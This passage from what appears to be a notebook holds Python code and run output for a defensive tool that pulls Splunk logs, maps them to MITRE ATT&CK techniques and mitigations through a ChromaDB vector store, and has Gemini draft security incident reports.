        while not job.is_ready():
            time.sleep(0.5) # Increased sleep from 0.1 to 0.5 seconds
            # Print the current dispatch state of the job for more detailed debugging
            print(f"Job {job.sid} status: {job.content.get('dispatchState')}")
            
            if time.time() - start_time > max_wait_time:
                print(f"Job {job.sid} timed out after {max_wait_time} seconds. Current status: {job.content.get('dispatchState')}")
                job.cancel() # Attempt to cancel the job on Splunk
                return [] # Return empty list if timeout occurs

        # After job is ready, check if it's done or if there are messages
        if job.is_done():
            print(f"Splunk search job {job.sid} is DONE. Final dispatch state: {job.content.get('dispatchState')}")
            if job.messages: # Check for messages even if done (warnings, etc.)
                print(f"Job {job.sid} messages: {job.messages}")

            reader = results.ResultsReader(job.results())
            events = []
            for item in reader:
                events.append(item)
            job.cancel() # Clean up the search job to free resources on Splunk
            print(f"Successfully retrieved {len(events)} events from Splunk for Job ID {job.sid}.")
            return events
        else: # This block handles cases where the job might not complete successfully
            print(f"Splunk search job {job.sid} did not complete successfully. Final status: {job.content.get('dispatchState')}")
            if job.messages: # Print any error/warning messages
                print(f"Job {job.sid} messages: {job.messages}")
            job.cancel()
            return []
    except Exception as e:
        print(f"Error running Splunk query: {e}")
        return []
    
# --- Embedding & ChromaDB Functions ---
def get_embedding(text):
    """Generates an embedding for the given text using the specified Gemini embedding model."""
    try:
        # Use RETRIEVAL_DOCUMENT for texts meant to be retrieved (like knowledge base entries)
        response = genai.embed_content(model=embedding_model, content=text, task_type="RETRIEVAL_DOCUMENT")
        return response['embedding']
    except Exception as e:
        print(f"Error generating embedding for text (first 50 chars): '{text[:50]}...': {e}")
        return None

def load_mitre_attack_data(stix_json_path=MITRE_STIX_JSON_PATH):
    """
    Loads MITRE ATT&CK techniques AND their associated mitigations from a STIX 2.x JSON file.
    """
    print(f"Loading MITRE ATT&CK data from {stix_json_path} using stix2...")
    try:
        stix_store = MemoryStore()
        stix_store.load_from_file(stix_json_path)
        print("STIX store loaded successfully.") # Debug print

        # --- DEBUGGING MITIGATIONS (These are good, keep them to confirm) ---
        all_mitigations_raw = stix_store.query(Filter("type", "=", "course-of-action"))
        print(f"DEBUG: Found {len(all_mitigations_raw)} raw 'course-of-action' objects in the STIX file.")

        all_relationships_raw = stix_store.query(Filter("type", "=", "relationship"))
        print(f"DEBUG: Found {len(all_relationships_raw)} raw 'relationship' objects in the STIX file.")

        mitigates_relationships_raw = stix_store.query(Filter("relationship_type", "=", "mitigates"))
        print(f"DEBUG: Found {len(mitigates_relationships_raw)} raw 'mitigates' relationships.")
        # --- END DEBUGGING MITIGATIONS ---
        
        attack_data_points = []
        mitigation_data_points = []

        # --- NEW STRATEGY: Load all mitigations (course-of-action objects) first ---
        # This creates a map from STIX ID to mitigation details for easy lookup
        mitigations_map = {}
        for miti_sdo in all_mitigations_raw:
            chroma_mitigation_id = miti_sdo.id
            display_mitigation_id = miti_sdo.id # Default
            
            for ext_ref in miti_sdo.external_references:
                if ext_ref.get('source_name') == 'mitre-attack' and 'external_id' in ext_ref:
                    if ext_ref['external_id'].startswith('M'):
                        display_mitigation_id = ext_ref['external_id']
                        break # Prefer M-ID
                    elif ext_ref['external_id'].startswith('T') and not display_mitigation_id.startswith('M'):
                        # Only use T-ID if no M-ID was found
                        display_mitigation_id = ext_ref['external_id']
                        
            mitigation_description = miti_sdo.description if hasattr(miti_sdo, 'description') else "No description available."
            
            full_mitigation_text = (
                f"MITRE ATT&CK Mitigation: {miti_sdo.name} (ID: {display_mitigation_id})\n"
                f"Description: {mitigation_description}"
                # We won't add "Mitigates Technique:" here directly, as a mitigation can mitigate multiple.
                # This info is better for prompt context when reporting.
            )
            
            mitigation_data_points.append({
                "id": chroma_mitigation_id,
                "text": full_mitigation_text,
                "metadata": {
                    "type": "mitre_attack_mitigation",
                    "mitigation_stix_id": miti_sdo.id,
                    "mitigation_id_external": display_mitigation_id,
                    "mitigation_name": miti_sdo.name,
                    "source_file": stix_json_path
                }
            })
            mitigations_map[miti_sdo.id] = {
                "name": miti_sdo.name,
                "id_external": display_mitigation_id,
                "description": mitigation_description
            }
        # --- END NEW STRATEGY for Mitigations ---


        # Query for all Attack Pattern objects (techniques)
        techniques = stix_store.query(Filter("type", "=", "attack-pattern"))
        print(f"DEBUG: Found {len(techniques)} 'attack-pattern' objects.") # Debug print

        for tech in techniques:
            mitre_id = None
            for ext_ref in tech.external_references:
                if ext_ref.get('source_name') == 'mitre-attack' and 'external_id' in ext_ref:
                    if ext_ref['external_id'].startswith('T'):
                        mitre_id = ext_ref['external_id']
                        break
            if not mitre_id:
                continue

            description = tech.description if hasattr(tech, 'description') else "No description available."
            
            tactics_names = []
            if hasattr(tech, 'x_mitre_tactic_refs'):
                for tactic_ref_id in tech.x_mitre_tactic_refs:
                    tactic_sdo = stix_store.get(tactic_ref_id)
                    if tactic_sdo and tactic_sdo.type == 'tactic':
                        tactics_names.append(tactic_sdo.name)
            tactics_str = ', '.join(tactics_names) if tactics_names else 'N/A'
            
            # Construct full text for embedding for techniques
            full_tech_text = (
                f"MITRE ATT&CK Technique: {tech.name} (ID: {mitre_id})\n"
                f"Tactics: {tactics_str}\n"
                f"Description: {description}\n"
                f"URL: {tech.external_references[0]['url'] if tech.external_references else 'N/A'}"
            )
            
            attack_data_points.append({
                "id": mitre_id,
                "text": full_tech_text,
                "metadata": {
                    "type": "mitre_attack_technique",
                    "technique_id": mitre_id,
                    "technique_name": tech.name,
                    "tactics": tactics_str,
                    "is_subtechnique": tech.x_mitre_is_subtechnique if hasattr(tech, 'x_mitre_is_subtechnique') else False,
                    "source_file": stix_json_path
                }
            })

            # We already populated mitigation_data_points with all mitigations.
            # The relationship is primarily for search context/linking if needed later.
            # We don't need to iterate through mitigation_relationships again here to ADD them.
            # The relationships will be used by the LLM logic to find *relevant* mitigations.

        print(f"Loaded {len(attack_data_points)} MITRE ATT&CK techniques.")
        print(f"Loaded {len(mitigation_data_points)} MITRE ATT&CK mitigations.")

        return attack_data_points + mitigation_data_points # Combine for single populate call

    except FileNotFoundError:
        print(f"Error: MITRE ATT&CK STIX JSON file not found at '{stix_json_path}'")
        print("Please download 'enterprise-attack.json' from https://attack.mitre.org/resources/attack-data-and-tools/ and place it in the script's directory.")
        return []
    except Exception as e:
        print(f"Error loading MITRE ATT&CK data: {e}")
        return []    
    except FileNotFoundError:
        print(f"Error: MITRE ATT&CK STIX JSON file not found at '{stix_json_path}'")
        print("Please download 'enterprise-attack.json' from https://attack.mitre.org/resources/attack-data-and-tools/ and place it in the script's directory.")
        return []
    except Exception as e:
        print(f"Error loading MITRE ATT&CK data: {e}")
        return []

def populate_security_knowledge_base(data_points):
    """Populates the ChromaDB collection with security knowledge data points, avoiding duplicates."""
    print(f"Attempting to add {len(data_points)} documents to the knowledge base.")
    
    # Get existing IDs to prevent adding duplicates
    existing_ids_result = security_collection.get(include=[])
    existing_ids = set(existing_ids_result.get('ids', []))

    docs_to_add = []
    embeddings_to_add = []
    metadatas_to_add = []
    ids_to_add = []

    for dp in data_points:
        unique_id = dp.get("id")
        if not unique_id:
            # Generate a unique ID if not provided (e.g., for custom knowledge)
            unique_id = f"custom_knowledge_{hash(dp['text'])}"

        if unique_id in existing_ids:
            # print(f"Skipping existing document with ID: {unique_id}") # Uncomment for verbose debugging
            continue

        embedding = get_embedding(dp["text"])
        if embedding is not None: # Ensure embedding was successfully generated
            docs_to_add.append(dp["text"])
            embeddings_to_add.append(embedding)
            metadatas_to_add.append(dp.get("metadata", {}))
            ids_to_add.append(unique_id)
        else:
            print(f"Skipping document due to embedding failure: {dp['text'][:50]}...")

    if docs_to_add:
        try:
            security_collection.add(
                documents=docs_to_add,
                embeddings=embeddings_to_add,
                metadatas=metadatas_to_add,
                ids=ids_to_add
            )
            print(f"Populated vector store with {len(docs_to_add)} new security knowledge documents.")
        except Exception as e:
            print(f"Error adding documents to ChromaDB: {e}")
    else:
        print("No new unique documents to add to the vector store.")

def search_security_knowledge_base(query_text, n_results=5, filter_metadata=None):
    """
    Searches the ChromaDB knowledge base for relevant documents.
    Args:
        query_text (str): The text to search for.
        n_results (int): Number of results to return.
        filter_metadata (dict, optional): A dictionary to filter results by metadata.
                                          E.g., {"type": "mitre_attack_technique"}.
    Returns:
        dict: ChromaDB query results (documents, distances, metadatas).
    """
    query_embedding = get_embedding(query_text)
    if query_embedding is not None:
        results = security_collection.query(
            query_embeddings=[query_embedding],
            n_results=n_results,
            include=['documents', 'distances', 'metadatas'],
            where=filter_metadata # Apply metadata filtering if provided
        )
        return results
    return None

# --- AI Report Generation Function ---
def generate_incident_report(splunk_logs, relevant_knowledge, mitre_mappings, incident_summary=""):
    """
    Generates a comprehensive security incident report using Gemini.
    `relevant_knowledge` now primarily contains suggested mitigations.
    """
    # Format MITRE details for the prompt
    mitre_details_str = ""
    if mitre_mappings:
        mitre_details_str = "\n**Potential MITRE ATT&CK Mappings:**\n"
        for mapping in mitre_mappings:
            mitre_details_str += f"* **Technique:** {mapping.get('technique_name', 'N/A')} ({mapping.get('technique_id', 'N/A')})\n"
            if mapping.get('tactics') and mapping['tactics'] != 'N/A':
                mitre_details_str += f"  **Tactics:** {mapping['tactics']}\n"
            description_text = str(mapping.get('description', 'No description.')).strip()
            # Extract just the MITRE technique description for brevity in report
            clean_description = description_text.split("Description: ")[1].split("\nURL:")[0].strip() if "Description: " in description_text else description_text
            mitre_details_str += f"  **Description:** {clean_description[:200]}...\n"
            mitre_details_str += f"  **Confidence (similarity score):** {mapping.get('distance_score', 0.0):.4f}\n"

    # Main prompt for Gemini
    prompt = f"""
You are an AI-driven SOC analyst assistant. Your task is to generate a concise and informative incident report based on the provided Splunk logs, potential MITRE ATT&CK mappings, and recommended mitigations.

---
**Splunk Logs (Raw Data for Context):**
{splunk_logs}

---
**Potential MITRE ATT&CK Mappings (Most Relevant First):**
{mitre_details_str if mitre_details_str else "No specific MITRE ATT&CK mappings found or provided. Analyze logs for common adversary behaviors."}

---
**Recommended Mitigations (from Knowledge Base):**
{relevant_knowledge if relevant_knowledge else "No specific mitigation recommendations found. Consider general security best practices."}

---
**Incident Summary (if provided by human analyst):**
{incident_summary if incident_summary else "No specific summary provided, analyze logs for key details."}

---
**Instructions for Report Generation:**
1.  **Incident Title:** Create a clear and descriptive title for the incident.
2.  **Date/Time of Detection:** Extract the earliest and latest timestamps from the logs. Provide a range if multiple times.
3.  **Affected Systems/Users:** Identify specific hosts, IP addresses, or users mentioned in the logs.
4.  **Description of Incident:** Summarize the observed events chronologically. **Crucially, explain how the observed behavior aligns with the most relevant MITRE ATT&CK Tactics and Techniques, referencing their IDs and names from the provided mappings.**
5.  **Attack Vector/Technique (MITRE ATT&CK IDs and names):** Explicitly list the *most relevant* MITRE ATT&CK Tactics and Techniques identified (e.g., "T1078 - Valid Accounts, T1110 - Brute Force").
6.  **Impact:** Briefly describe the potential impact of this incident (e.g., data breach, service disruption, account compromise, unauthorized access).
7.  **Recommended Actions/Remediation:** Based on the identified MITRE techniques and the **"Recommended Mitigations"** section, suggest immediate and long-term actions for containment, eradication, and recovery. If no specific mitigations are found, provide general best practices based on the MITRE techniques.
8.  **Status:** (e.g., New Incident, In Progress, Contained, Resolved) - Default to "New Incident" if unsure.
9.  **Analyst Notes:** Any other observations, open questions, or next steps for further investigation.

Please present the report in a clear, markdown-formatted structure, focusing on actionable intelligence.
"""
    try:
        response = llm.generate_content(prompt)
        return response.text
    except Exception as e:
        print(f"Error generating incident report with Gemini: {e}")
        return "Failed to generate incident report."

# --- Main Orchestration Logic ---
def ai_soc_analyst_assistant(splunk_query, incident_summary="", distance_threshold=0.3):
    print(f"--- Starting AI SOC Analyst Assistant for query ---")
    print(f"DEBUG: Splunk query string:\n```\n{splunk_query}\n```")

    splunk_service = connect_to_splunk()

    if splunk_service:
        print(f"DEBUG: Successfully obtained Splunk service object. Type: {type(splunk_service)}")
    else:
        print("DEBUG: Splunk service object is None. Connection likely failed or returned None.")
        return "Failed to connect to Splunk. Cannot proceed."

    print("Retrieving data from Splunk...")
    raw_splunk_events = run_splunk_query(splunk_service, splunk_query )

    if not raw_splunk_events:
        print("No relevant Splunk logs found for the given query.")
        return generate_incident_report("No logs retrieved.", "No relevant knowledge.", [], incident_summary)

    combined_log_text = " ".join([event.get('_raw', '') for event in raw_splunk_events])

    # relevant_knowledge_text will specifically contain mitigations now
    relevant_knowledge_text = "" 

    # Search for relevant MITRE ATT&CK techniques
    mitre_search_results = search_security_knowledge_base(
        combined_log_text, 
        n_results=5, 
        filter_metadata={"type": "mitre_attack_technique"} # Explicitly search only techniques
    )
    
    mitre_mappings = []
    if mitre_search_results and mitre_search_results['documents']:
        for i in range(len(mitre_search_results['documents'][0])):
            doc = mitre_search_results['documents'][0][i]
            meta = mitre_search_results['metadatas'][0][i]
            dist = mitre_search_results['distances'][0][i]

            # Similarity is 1 - (distance^2 / 2) for normalized vectors and Euclidean (L2) distance
            similarity_score = 1 - (dist**2 / 2) 
            
            if similarity_score > 0.7: # Threshold for considering a MITRE mapping relevant
                mitre_mappings.append({
                    "technique_id": meta.get('technique_id'),
                    "technique_name": meta.get('technique_name'),
                    "tactics": meta.get('tactics'),
                    "description": doc, # The full text of the document
                    "distance_score": similarity_score # Pass the calculated similarity
                })

    # --- NEW: Search for relevant MITRE ATT&CK Mitigations ---
    # This search uses a higher threshold or different strategy as it's for 'recommended actions'
    # The query for mitigations could be based on the identified techniques or the raw log text.
    # Let's try searching based on the identified techniques for more relevant mitigations.
    mitigations_text_to_query = ""
    if mitre_mappings:
        mitigations_text_to_query = " ".join([m['description'] for m in mitre_mappings])
    else:
        mitigations_text_to_query = combined_log_text # Fallback to raw logs if no techniques found

    relevant_mitigations_results = search_security_knowledge_base(
        mitigations_text_to_query,
        n_results=3, # Get top 3 most relevant mitigations
        filter_metadata={"type": "mitre_attack_mitigation"} # Explicitly search only mitigations
    )
    
    if relevant_mitigations_results and relevant_mitigations_results['documents']:
        relevant_knowledge_text = "\n**Recommended Mitigations (from MITRE ATT&CK):**\n"
        for i in range(len(relevant_mitigations_results['documents'][0])):
            doc = relevant_mitigations_results['documents'][0][i]
            meta = relevant_mitigations_results['metadatas'][0][i]
            dist = relevant_mitigations_results['distances'][0][i]
            similarity_score = 1 - (dist**2 / 2) # Assuming normalized vectors and Euclidean (L2) distance

            if similarity_score > 0.6: # A slightly lower threshold for suggesting mitigations
                # Use 'mitigation_name' and 'mitigation_id_external' for display
                mitigation_name = meta.get('mitigation_name', 'N/A')
                mitigation_id_for_display = meta.get('mitigation_id_external', meta.get('mitigation_stix_id', 'N/A'))
                
                # Extract description neatly
                description_start_index = doc.find("Description: ")
                description_end_index = doc.find("Mitigates Technique STIX ID:")
                clean_description = "No description available."
                if description_start_index != -1 and description_end_index != -1:
                    clean_description = doc[description_start_index + len("Description: "):description_end_index].strip()
                elif description_start_index != -1: # If 'Mitigates Technique' part isn't there
                    clean_description = doc[description_start_index + len("Description: "):].strip()
                
                relevant_knowledge_text += (
                    f"* **Mitigation:** {mitigation_name} (ID: {mitigation_id_for_display})\n"
                    f"  **Description:** {clean_description[:200]}...\n" # Extract just description
                    f"  **Similarity Score:** {similarity_score:.4f}\n"
                )
    
    # Generate the final report
    report = generate_incident_report(
        "\n".join([event.get('_raw', '') for event in raw_splunk_events]),
        relevant_knowledge_text, # Pass the found mitigations as "relevant_knowledge"
        mitre_mappings,
        incident_summary
    )
    return report


# --- Main Execution Block ---
if __name__ == "__main__":
    print("--- Starting AI SOC Analyst Assistant (Full Architecture) ---")

    # --- Step 0: Ensure Security Knowledge Base is Populated ---
    print("\n--- Checking/Populating Security Knowledge Base ---")
    
    # Check if MITRE data (techniques and mitigations) needs to be populated
    total_docs_in_db = security_collection.count()
    needs_mitre_population = False
    
    if total_docs_in_db == 0:
        needs_mitre_population = True
        print("ChromaDB collection is currently empty. Populating MITRE ATT&CK techniques and mitigations.")
    else:
        # Corrected way to check counts of specific types in ChromaDB
        try:
            # We get all IDs for specific types and then count them
            tech_ids = security_collection.get(where={"type": "mitre_attack_technique"}, include=[])['ids']
            miti_ids = security_collection.get(where={"type": "mitre_attack_mitigation"}, include=[])['ids']
            tech_count = len(tech_ids)
            miti_count = len(miti_ids)
            
            # Use a more robust check: are there a *reasonable* number of each type?
            # A full Enterprise ATT&CK v14 has ~600+ techniques and ~60+ mitigations.
            # Adjust these thresholds based on your ATT&CK version and expectations.
            # Using absolute numbers is better than just 0.
            if tech_count < 500 or miti_count < 50: # Example: If less than 500 techniques or 50 mitigations
                needs_mitre_population = True
                print(f"Insufficient MITRE ATT&CK data found (techniques: {tech_count}, mitigations: {miti_count}). Repopulating...")
            else:
                print(f"MITRE ATT&CK data (techniques: {tech_count}, mitigations: {miti_count}) already present.")
        except Exception as e:
            print(f"Warning: Error checking for existing MITRE data: {e}. Assuming MITRE data needs population.")
            # This can happen if the collection is truly empty or corrupted
            needs_mitre_population = True

    if needs_mitre_population:
        # Clear existing collection if we are repopulating to ensure consistency
        print("Clearing existing ChromaDB collection to repopulate with fresh MITRE data...")
        try:
            # Delete and recreate the collection to ensure it's fresh
            chroma_client.delete_collection(SECURITY_COLLECTION_NAME)
        except Exception as e:
            print(f"Warning: Could not delete collection (might not exist or be empty): {e}")
        security_collection = chroma_client.get_or_create_collection(SECURITY_COLLECTION_NAME) # Recreate
        
        mitre_all_data_points = load_mitre_attack_data(stix_json_path=MITRE_STIX_JSON_PATH)
        if mitre_all_data_points:
            populate_security_knowledge_base(mitre_all_data_points)
        else:
            print("MITRE ATT&CK data not loaded from file. AI mapping might be less effective.")
    
    # Removed the specific 'sample_security_knowledge' array and its population logic here.
    # If you later want to add other custom knowledge (playbooks, past incidents) 
    # that are NOT MITRE techniques/mitigations, you would add them here using
    # populate_security_knowledge_base with appropriate 'type' metadata (e.g., {"type": "playbook"}).

    print(f"\nTotal unique documents in knowledge base: {security_collection.count()}")

    # --- Run a combined simulated scenario ---
    # This Splunk query generates mock logs that hint at various security events.
    splunk_simulated_logs ="""search index="main" source="archive.zip:*" host="DESKTOP-48V92VC" "Severity Level"="Medium" | head 10"""
    

    print("\n\n=== Running Combined Simulated Scenario (with MITRE Mapping) ===")
    incident_report = ai_soc_analyst_assistant(
        splunk_simulated_logs,
        incident_summary="Simulated multiple failed SSH login attempts, a successful login, an attempted SQL Injection, and an encoded PowerShell command on an endpoint."
    )
    print("\n--- Final Incident Report ---")
    print(incident_report)

--- Starting AI SOC Analyst Assistant (Full Architecture) ---

--- Checking/Populating Security Knowledge Base ---
MITRE ATT&CK data (techniques: 823, mitigations: 268) already present.

Total unique documents in knowledge base: 1091


=== Running Combined Simulated Scenario (with MITRE Mapping) ===
--- Starting AI SOC Analyst Assistant for query ---
DEBUG: Splunk query string:
```
search index="main" source="archive.zip:*" host="DESKTOP-48V92VC" "Severity Level"="Medium" | head 10
```
Attempting to connect to Splunk at https://127.0.0.1:8089...
Successfully connected to Splunk.
DEBUG: Successfully obtained Splunk service object. Type: <class 'splunklib.client.Service'>
Retrieving data from Splunk...
Attempting to run Splunk query:
```
search index="main" source="archive.zip:*" host="DESKTOP-48V92VC" "Severity Level"="Medium" | head 10
```
Splunk Job ID: 1748160431.166
Job 1748160431.166 status: PARSING
Splunk search job 1748160431.166 is DONE. Final dispatch state: DONE
Successfully r

  reader = results.ResultsReader(job.results())



--- Final Incident Report ---
## Incident Report

**Incident Title:** Potential Distributed Denial of Service (DDoS) and Malware Activity Detected

**Date/Time of Detection:** 2023-10-10 00:59:20 - 2023-10-11 19:34:23

**Affected Systems/Users:**
*   IP Addresses: 22.36.249.229, 169.96.251.75, 15.87.212.52, 155.139.226.246, 117.123.202.179, 76.155.186.198, 84.187.46.81, 13.165.19.36, 109.202.200.248, 34.41.151.160, 111.103.192.212, 72.99.102.231, 204.226.111.197, 159.138.159.86, 220.71.249.174, 66.180.126.45, 14.102.21.108, 109.198.45.7, 189.70.191.200, 21.131.89.145
*   Users: Vihaan Randhawa, Ahana Wable, Anika Shan, Aradhya Rajagopal, Jiya Kant, Kanav Chand, Tejas Gulati, Pihu Chawla, Zaina Kumar, Khushi Char

**Description of Incident:**

Multiple alerts were triggered between 2023-10-10 and 2023-10-11 involving network traffic and potential malicious activity. The logs indicate potential signs of DDoS attacks, as well as malware infections. Specific patterns ("Known Pattern A" an

In [1]:
import os

file_path = "enterprise-attack.json" # Ensure this path is correct

if os.path.exists(file_path):
    print(f"Attempting to read file: {file_path}")
    try:
        with open(file_path, 'r', encoding='utf-8') as f:
            content = f.read()
            if '"type": "course-of-action"' in content:
                print("SUCCESS: Found '\"type\": \"course-of-action\"' in the file.")
                # You can also count them to get an idea
                count = content.count('"type": "course-of-action"')
                print(f"Approximate number of 'course-of-action' entries: {count}")
            else:
                print("FAILURE: Did NOT find '\"type\": \"course-of-action\"' in the file.")
                print("This strongly indicates the file is not the correct MITRE ATT&CK STIX data with mitigations.")
            
            if '"relationship_type": "mitigates"' in content:
                print("SUCCESS: Found '\"relationship_type\": \"mitigates\"' in the file.")
                count_mitigates = content.count('"relationship_type": "mitigates"')
                print(f"Approximate number of 'mitigates' relationships: {count_mitigates}")
            else:
                print("FAILURE: Did NOT find '\"relationship_type\": \"mitigates\"' in the file.")
                print("This strongly indicates the file is missing the relationships necessary for linking techniques to mitigations.")

    except Exception as e:
        print(f"Error reading file: {e}")
else:
    print(f"Error: File not found at {file_path}. Please ensure 'enterprise-attack.json' is in the same directory as your script.")

Attempting to read file: enterprise-attack.json
SUCCESS: Found '"type": "course-of-action"' in the file.
Approximate number of 'course-of-action' entries: 268
SUCCESS: Found '"relationship_type": "mitigates"' in the file.
Approximate number of 'mitigates' relationships: 1421
